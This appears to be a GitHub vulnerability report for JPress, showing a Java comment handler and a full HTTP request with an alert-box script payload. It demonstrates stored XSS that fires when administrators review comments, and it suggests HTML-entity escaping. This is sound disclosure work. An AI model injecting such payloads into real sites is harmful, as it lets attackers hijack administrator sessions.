Closed thiscodecc closed 4 years ago
1.No filtering of the comments on the front-end articles.This place has a storage XSS vulnerability.
code io.jpress.module.article.controller.api.ArticleApiController
public void postComment() { Long articleId = getParaToLong("articleId"); Long pid = getParaToLong("pid"); String content = getRawData(); if (articleId == null || articleId <= 0) { renderFailJson(); return; } if (StrUtil.isBlank(content)) { renderJson(Ret.fail().set("message", "评论内容不能为空")); return; } else { content = StrUtil.escapeHtml(content); } Article article = articleService.findById(articleId); if (article == null) { renderFailJson(); return; } // 文章关闭了评论的功能 if (!article.isCommentEnable()) { renderJson(Ret.fail().set("message", "该文章的评论功能已关闭")); return; } //是否开启评论功能 Boolean commentEnable = optionService.findAsBoolByKey("article_comment_enable"); if (commentEnable == null || commentEnable == false) { renderJson(Ret.fail().set("message", "评论功能已关闭")); return; } User user = getLoginedUser(); if (user == null) { renderJson(Ret.fail().set("message", "用户未登录")); return; } ArticleComment comment = new ArticleComment(); comment.setArticleId(articleId); comment.setContent(content); comment.setPid(pid); comment.setEmail(user.getEmail()); comment.setUserId(user.getId()); comment.setAuthor(user.getNickname()); comment.put("user", user.keepSafe()); //是否是管理员必须审核 Boolean reviewEnable = optionService.findAsBoolByKey("article_comment_review_enable"); if (reviewEnable != null && reviewEnable == true) { comment.setStatus(ArticleComment.STATUS_UNAUDITED); } /** * 无需管理员审核、直接发布 */ else { comment.setStatus(ArticleComment.STATUS_NORMAL); } //记录文章的评论量 articleService.doIncArticleCommentCount(articleId); if (pid != null) { //记录评论的回复数量 commentService.doIncCommentReplyCount(pid); } commentService.saveOrUpdate(comment); Ret ret = Ret.ok(); if (comment.isNormal()) { ret.set("comment", comment).set("code", 0); } else { ret.set("code", 0); } renderJson(ret); ArticleKit.doNotifyAdministrator(article, comment, user); }
Payload
POST /article/postComment HTTP/1.1 Host: thiscode.cc:8080 Content-Length: 54 Accept: */* Origin: http://thiscode.cc:8080 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: BEEFHOOK=OIQ9kdw1dWWmTkd3EOxKodjVpHIynv6C3kEwio8YBIVnvuQNHFkFV9QyrURnHKFB1ZAEfNptsL7fvOZT; Hm_lvt_b023b8f407cc8a64265fb326a375c029=1569300497; _jpanonym="OWZmNmYyOWYwZjU5NDI3MzQ4MGI5MDc2YTAxYzQzNTQjMTU3MDExMTUyMDczMiMzMTUzNjAwMCNOR05pTXpOaFpUTXhNek0zTkRrM01UaGtNek16TVRBd1pUZzROV1JrWVRBPQ=="; _jpuid="MGYyMjBkMDZiY2Q4ZWNhYWQxYTkzNjZhMWZjZjRlNGUjMTU3MDExMTU0NTIwMiM2MDQ4MDAjTVE9PQ=="; Hm_lvt_bfe2407e37bbaa8dc195c5db42daf96a=1570111546; csrf_token=3ead8a2246874de6a1ebe991b807027d; Hm_lpvt_bfe2407e37bbaa8dc195c5db42daf96a=1570113168 Connection: close articleId=2&pid=&content=<script>alert('xss')</script>
Auditing comment lists in the background triggers vulnerabilities.
screenshot:
Back-end filtering or front-end output filtering.Converting to HTML entities.
Ask the author to fix this vulnerability.Thanks.
closed in version 3.0
JPressProjects
commented
4 years ago JPressProjects
commented
4 years ago
1.No filtering of the comments on the front-end articles.This place has a storage XSS vulnerability.
code io.jpress.module.article.controller.api.ArticleApiControllerPayloadAuditing comment lists in the background triggers vulnerabilities.screenshot:Back-end filtering or front-end output filtering.Converting to HTML entities.Ask the author to fix this vulnerability.Thanks.